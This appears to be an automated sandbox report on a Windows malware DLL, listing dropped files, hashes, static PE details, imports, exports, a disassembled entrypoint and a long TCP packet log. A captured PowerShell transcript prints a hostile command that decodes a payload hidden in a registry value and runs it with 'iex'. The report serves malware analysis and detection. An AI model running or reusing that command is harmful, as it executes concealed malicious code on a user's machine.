                                                                                Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                C:\Users\user\AppData\Local\Temp\~DF1332C2BC6A2109BF.TMP
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):29745
                                                                                Entropy (8bit):0.2920107282763179
                                                                                Encrypted:false
                                                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAC9laAC9lrz:kBqoxxJhHWSVSEabeQ2y
                                                                                MD5:CE909A43525B3843C907DCBE55E9D7DD
                                                                                SHA1:8B6E53CCBAAB132FF8100ECB696282F011402047
                                                                                SHA-256:540A8B39EAF1EF9CF341697FC4CDABBEBDED17B16321398C539639FD17EE1602
                                                                                SHA-512:027F1DF5288441E3BFF63ABABD90521E2A72DC20FFAC545E0F180483761229D13254375ADA525D3C5155C1BAC6602117B24617A160C4B9D21C30721B9DF17446
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Temp\~DF5FA304ED7E9A0ED0.TMP
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):40241
                                                                                Entropy (8bit):0.6864507266441422
                                                                                Encrypted:false
                                                                                SSDEEP:192:kBqoxKAuqR+djBgDKYpPktsBwYpPktsBuMYpPktsB4:kBqoxKAuqR+djBgDKsE4wsE4fsE44
                                                                                MD5:F276069208EC3C8952B6E8E8E1564B0A
                                                                                SHA1:803E9CB6E1F3E1D9574005489D475557808140D0
                                                                                SHA-256:90EA0A9C7FB910F622AB82C822FC18F72121BB4F0A2C653CA77C32F5779691D7
                                                                                SHA-512:18004ACA2C318F1ACE76B1989EEA5032F62115146C4E751FCDC19E23767009214D5931F9813AA3313941C530FCFA7F50583DFB6FED5249BD1795D1832C772B3E
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Temp\~DF7FAEED37798869B9.TMP
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):14037
                                                                                Entropy (8bit):1.0146837892574634
                                                                                Encrypted:false
                                                                                SSDEEP:96:kBqoIYsYyYcoL0PiEJXZvmovvOoVOO0Ra:kBqoIx3X+0PiEJXxmEvOGOO0w
                                                                                MD5:5189831F91DAF1D84A02CF4C4EE339C7
                                                                                SHA1:E71BFAB121B47FAA9DA6CF8ABA1222759347EBCA
                                                                                SHA-256:581C0E68D6BE4E812447C6949484405F2294D07406704CA9C4F1A9BB37EA8E7C
                                                                                SHA-512:D9C856AB10AC9B70519CDC42EA7BC7F14F34B7D0F0ED58B89BE77BB3C5294891C09ECA66E3D3B18EBA7227C423EDA6283E1C913F6EE03E07B864055B09325C9E
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Temp\~DF8631D245B69528D2.TMP
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):40177
                                                                                Entropy (8bit):0.6736146002540434
                                                                                Encrypted:false
                                                                                SSDEEP:192:kBqoxKAuqR+rl3elQB0ySjOB0ySjtB0ySje:kBqoxKAuqR+rl3elQuzOuztuze
                                                                                MD5:29B0929FAE6706ADE713FDCFEFE7D868
                                                                                SHA1:B82583F96532A79969D135037D94C42E43F89B15
                                                                                SHA-256:8D38F57A66E0D48F49BD14499D9A2497F0B2FBD91FA3728FD791839209FE25D8
                                                                                SHA-512:9E52FDACAD0B85DF6D6D390EF801A957B69E2BEFBA06BB41AB4EBE2A0DC41A7FD0C3D0E4DAB45A89BBE8603B70E0BB98ACE1D2517AF195098A03F1699BABA44A
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Temp\~DFAE54027CE6C0BF31.TMP
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):40161
                                                                                Entropy (8bit):0.6731060804118951
                                                                                Encrypted:false
                                                                                SSDEEP:96:kBqoxKAuvScS+B/NMPO8P5NWBJs8ESL8P5NWBJs8ESY8P5NWBJs8ESV:kBqoxKAuqR+B/NMPO8KcSL8KcSY8KcSV
                                                                                MD5:BE49A89BFD8FC4C054735CE9EA025702
                                                                                SHA1:74875F5E7256E82909B656DB12D38FBAB6008D2F
                                                                                SHA-256:08F8F086F3287129EA1139B234CAD85E79F0F64E89592B9093001EEA48B07622
                                                                                SHA-512:EA5752E1B5A77D3867A1E29DB5F0776716E7722B7E5ACD052FBDFE6AA9EA188A3A02811AA6DBD3999209C567A5A7B3ACB2E3AFDD7B4DDBAB66367E726939DB23
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Local\Temp\~DFEAB8398C79AF2049.TMP
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):192720
                                                                                Entropy (8bit):3.1291712184396374
                                                                                Encrypted:false
                                                                                SSDEEP:3072:1Z/2BfcYmu5kLTzGtLZ/2Bfc/mu5kLTzGt:8a
                                                                                MD5:A37BC84025C19043BF6C889CB9AB181F
                                                                                SHA1:94C912B48FD9AC2F2C1F715AA9B6AFEF1AE77764
                                                                                SHA-256:6549B581F622B35E39619F99E6B9C6D236021990D128972784411D3026B51EAD
                                                                                SHA-512:EA66276CE564DE075A65B34731D2B320958B32453FDA90ABC8A437A8B8F954A57B6D0517E6B40A6D7136B037C556EF721B7F8C2991CA697344AD2C54225AB1A6
                                                                                Malicious:false
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H55P40337A8ZEK5DH4O4.temp
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):5149
                                                                                Entropy (8bit):3.1765133368694243
                                                                                Encrypted:false
                                                                                SSDEEP:96:tPTPQPm9SXAJreTPQP73SXAnRTPQPt9SXAf:Zot
                                                                                MD5:0AAE345F0DDA122968BF980E55B6A678
                                                                                SHA1:28C51C53B2E9A316C965C5676503804998C5839F
                                                                                SHA-256:46638A09011BBCC255A431C056D29A25B41E32765AC940D28BDBB158082DE111
                                                                                SHA-512:6B74178B76D5EADCB56E7E15273EC6185D2BC8701F779E78807F2FBEDDB5CBFA0B532C1DF9B7CEE6E45FA48F30CF788BE4E4C197CFE5FADF52A13B9AD5D794CD
                                                                                Malicious:false
                                                                                Preview: ...................................FL..................F.@.. .....@.>...R..Q......?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.<..PROGRA~1..t......L.>Q.<....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.OR/...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.JOR/......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]............:.O.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                                                                                C:\Users\user\AppData\Roaming\Microsoft\{FC666F93-2B96-8EB5-95F0-8FA2992433F6}
                                                                                Process:C:\Windows\explorer.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):57
                                                                                Entropy (8bit):4.143546527102675
                                                                                Encrypted:false
                                                                                SSDEEP:3:KIVMcxHVFXVR3AQEHlTEHFZF3:KIe2HF73
                                                                                MD5:9D4197DE2A8E54AF8708C4763C0A9CB2
                                                                                SHA1:8D34C1B5090C5C75DA80060E5F4005042B62003E
                                                                                SHA-256:4BF42ADDF077899E5B2F4782EF4507996D3533828D3E213785C1E4157D0BB83A
                                                                                SHA-512:014632B8E260F7A158853682BD13BE15BDE441B00B1762A00B882353E996D2B8C218F74E654C25CD85BB1C45AE58A16784819EDF1A93B159A4A8143994E02440
                                                                                Malicious:false
                                                                                Preview: 16-02-2021 00:59:08 | "0xb204e7e0_6005be7372c1a" | 4306..
                                                                                C:\Users\user\Documents\20210216\PowerShell_transcript.124406.8rVYw17M.20210216005826.txt
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1189
                                                                                Entropy (8bit):5.311506804336808
                                                                                Encrypted:false
                                                                                SSDEEP:24:BxSAbi7vBZFx2DOXUWOLCHGIYBtLW1HjeTKKjX4CIym1ZJXYOLCHGIYBt0nxSAZp:BZbYvjFoORF/1qDYB1ZuFXZZp
                                                                                MD5:53DDEDFF54B863A791D3EC6D82CD0E83
                                                                                SHA1:CCECE7BDE4A0C98F8E428ED6FEF05545B815FC40
                                                                                SHA-256:5E147647DF4CE61B7C5D938E804AEFA6261E86F8FD97EDADDCA4241C3ECDC480
                                                                                SHA-512:0F8B0B2AD2845B24F9AF352E87BE3032A49F0CC3C3DD9DD18C3A2FA6A6AFC3FF19E6870D51E1D57E11FF91718B7BB7E95AE01EB6591438AEA6B45FCC8C40C617
                                                                                Malicious:false
                                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20210216005827..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 124406 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 5424..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210216005827..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..**********************..

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):6.790714264316921
                                                                                TrID:
                                                                                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                • DOS Executable Generic (2002/1) 0.20%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll
                                                                                File size:360448
                                                                                MD5:f76b81b0397ae313b8f6d19d95c49edf
                                                                                SHA1:8f15106b524cc5db564845508a04ee3bf2709949
                                                                                SHA256:3e8b92cda2c0d1dc74de0b060f43c2baf23ab08af69667ddbbe66f78d5e0389a
                                                                                SHA512:d473bb6f8ae26418dffe3e9acaf6266e305c012b2fb57d5e82c8ffbc4c9cae6f1a4e496d5f3bdf0b7228964862a392f552b5847370331d8ad5fea9be7f3af9a6
                                                                                SSDEEP:6144:b87Sm49lFRQSAe5klIQm3n/ym1grjpY7nf9+v3lYdkv+hgG2xnG4c/gU:fm+3QSAdm3n/yogZgwv3Gqv0gG2tG4gv
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.6.&.X.&.X.&.X..F%.>.X..F6...X..F5...X./...#.X.&.Y.I.X..F*.'.X..F".'.X..F$.'.X..F .'.X.Rich&.X.........PE..L...y..E...........

                                                                                File Icon

                                                                                Icon Hash:74f0e4ecccdce0e4

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x100285d5
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x10000000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                DLL Characteristics:
                                                                                Time Stamp:0x45B6F579 [Wed Jan 24 05:58:17 2007 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:e0e710d4ed87ec11636d345dba071187

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                cmp dword ptr [esp+08h], 01h
                                                                                jne 00007FACDCACCC57h
                                                                                call 00007FACDCAD5A00h
                                                                                push dword ptr [esp+04h]
                                                                                mov ecx, dword ptr [esp+10h]
                                                                                mov edx, dword ptr [esp+0Ch]
                                                                                call 00007FACDCACCB42h
                                                                                pop ecx
                                                                                retn 000Ch
                                                                                mov eax, dword ptr [esp+04h]
                                                                                xor ecx, ecx
                                                                                cmp eax, dword ptr [100503A0h+ecx*8]
                                                                                je 00007FACDCACCC64h
                                                                                inc ecx
                                                                                cmp ecx, 2Dh
                                                                                jl 00007FACDCACCC43h
                                                                                lea ecx, dword ptr [eax-13h]
                                                                                cmp ecx, 11h
                                                                                jnbe 00007FACDCACCC5Eh
                                                                                push 0000000Dh
                                                                                pop eax
                                                                                ret
                                                                                mov eax, dword ptr [100503A4h+ecx*8]
                                                                                ret
                                                                                add eax, FFFFFF44h
                                                                                push 0000000Eh
                                                                                pop ecx
                                                                                cmp ecx, eax
                                                                                sbb eax, eax
                                                                                and eax, ecx
                                                                                add eax, 08h
                                                                                ret
                                                                                call 00007FACDCAD3448h
                                                                                test eax, eax
                                                                                jne 00007FACDCACCC58h
                                                                                mov eax, 10050508h
                                                                                ret
                                                                                add eax, 08h
                                                                                ret
                                                                                call 00007FACDCAD3435h
                                                                                test eax, eax
                                                                                jne 00007FACDCACCC58h
                                                                                mov eax, 1005050Ch
                                                                                ret
                                                                                add eax, 0Ch
                                                                                ret
                                                                                push esi
                                                                                call 00007FACDCACCC3Ch
                                                                                mov ecx, dword ptr [esp+08h]
                                                                                push ecx
                                                                                mov dword ptr [eax], ecx
                                                                                call 00007FACDCACCBE2h
                                                                                pop ecx
                                                                                mov esi, eax
                                                                                call 00007FACDCACCC15h
                                                                                mov dword ptr [eax], esi
                                                                                pop esi
                                                                                ret
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                sub esp, 48h
                                                                                mov eax, dword ptr [10050514h]
                                                                                xor eax, ebp
                                                                                mov dword ptr [ebp-04h], eax
                                                                                push ebx
                                                                                xor ebx, ebx
                                                                                push esi
                                                                                mov esi, dword ptr [ebp+08h]
                                                                                cmp dword ptr [esi+14h], ebx
                                                                                push edi
                                                                                mov dword ptr [ebp-2Ch], ebx
                                                                                mov dword ptr [ebp-24h], ebx
                                                                                mov dword ptr [ebp-1Ch], ebx
                                                                                mov dword ptr [ebp-28h], ebx

                                                                                Rich Headers

                                                                                Programming Language:
                                                                                • [RES] VS2005 build 50727
                                                                                • [ C ] VS2005 build 50727
                                                                                • [EXP] VS2005 build 50727
                                                                                • [C++] VS2005 build 50727
                                                                                • [ASM] VS2005 build 50727
                                                                                • [LNK] VS2005 build 50727
                                                                                • [IMP] VS2008 SP1 build 30729

                                                                                Data Directories

                                                                                Name | Virtual Address | Virtual Size | Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x4f020 | 0x93 | .rdata
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4e754 | 0x3c | .rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb1000 | 0x4d0 | .rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb2000 | 0x1c98 | .reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3e220 | 0x1c | .rdata
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4cc28 | 0x40 | .rdata
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x3e000 | 0x1b4 | .rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                Sections

                                                                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                .text | 0x1000 | 0x3c44c | 0x3d000 | False | 0.709148469518 | data | 6.87914572387 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                .rdata | 0x3e000 | 0x110b3 | 0x12000 | False | 0.671644422743 | data | 6.3835832451 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data | 0x50000 | 0x604c8 | 0x4000 | False | 0.558715820312 | COM executable for DOS | 5.48871661926 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                .rsrc | 0xb1000 | 0x4d0 | 0x1000 | False | 0.150146484375 | data | 1.65729733757 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc | 0xb2000 | 0x2c74 | 0x3000 | False | 0.485595703125 | data | 4.83368153083 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xb10a0 | 0x2b0 | data | English | United States
RT_MANIFEST | 0xb1350 | 0x17d | XML 1.0 document text | English | United States

Imports

DLL | Import
KERNEL32.dll | ExitProcess, GetFileAttributesA, CreateProcessA, GetSystemDirectoryA, GetEnvironmentVariableA, MultiByteToWideChar, GetShortPathNameA, CopyFileA, GetTempFileNameA, LoadLibraryA, WaitForMultipleObjects, GetModuleFileNameA, VirtualProtect, GetCurrentProcessId, CompareStringW, CompareStringA, CreateFileA, SetStdHandle, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, ReadFile, GetLocaleInfoW, IsValidCodePage, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, InterlockedCompareExchange, InterlockedExchange, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetTimeFormatA, GetDateFormatA, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCommandLineA, GetVersionExA, HeapAlloc, GetProcessHeap, GetCPInfo, RaiseException, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, HeapReAlloc, GetProcAddress, GetModuleHandleA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetACP, GetOEMCP, GetTimeZoneInformation, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, HeapSize, GetUserDefaultLCID, SetEnvironmentVariableA
WS2_32.dll | ioctlsocket, inet_ntoa, WSAStartup, recvfrom, ntohl, inet_addr, htons, WSACleanup, recv, socket, getservbyname, send, getsockopt, listen

Exports

Name | Ordinal | Address
DllRegisterServer | 1 | 0x10021230
Exactnature | 2 | 0x10021130
Happenthousand | 3 | 0x100215a0
Probablepath | 4 | 0x10021650

Version Infos

Description | Data
LegalCopyright | Copyright Strongimagine 1996-2016
FileVersion | 8.3.8.121
CompanyName | Strongimagine
ProductName | Room know
ProductVersion | 8.3.8.121 Soundbank
FileDescription | Room know
OriginalFilename | Sing.dll
Translation | 0x0409 0x04e4

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/16/21-00:58:10.168631 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.4 | 8.8.8.8

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                Feb 16, 2021 00:57:39.646225929 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.647324085 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.647368908 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.647396088 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.647439003 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.648505926 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.648546934 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.648581982 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.648600101 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.649492025 CET44349762151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.649604082 CET49762443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.650257111 CET44349762151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.650336981 CET49762443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.651521921 CET49762443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.655762911 CET44349761151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.655881882 CET44349761151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.655925035 CET44349761151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.655992031 CET49761443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.656022072 CET49761443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.656680107 CET49761443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.666287899 CET44349763151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.666344881 CET44349763151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.666423082 CET49763443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.666433096 CET44349763151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.666496038 CET49763443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.666620970 CET44349759151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.666709900 CET49759443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.666995049 CET44349759151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.667313099 CET49759443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.667850971 CET44349760151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.667954922 CET44349760151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.668014050 CET49760443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.668066025 CET49760443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.669214964 CET49763443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.672524929 CET49759443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.672873020 CET49760443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.680202961 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.680253983 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.680291891 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.680345058 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.680347919 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.680407047 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.680411100 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.681241989 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.681287050 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.681328058 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.681349039 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.681355953 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.681405067 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.681449890 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.681493044 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.681505919 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.681541920 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.681541920 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.681586981 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.681591034 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.681627035 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.681632042 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.681674004 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.682588100 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.682651997 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.682678938 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.682698965 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.683779001 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.683844090 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.683850050 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.683887005 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.683888912 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.683932066 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.684981108 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.685044050 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.685074091 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.685096025 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.686151028 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.686193943 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.686232090 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.686253071 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.687371016 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.687412024 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.687448025 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.687464952 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.688556910 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.688599110 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.688635111 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.688654900 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.689769983 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.689815044 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.689827919 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.689863920 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:57:39.690989017 CET44349764151.101.1.44192.168.2.4
                                                                                Feb 16, 2021 00:57:39.691034079 CET44349764151.101.1.44192.168.2.4
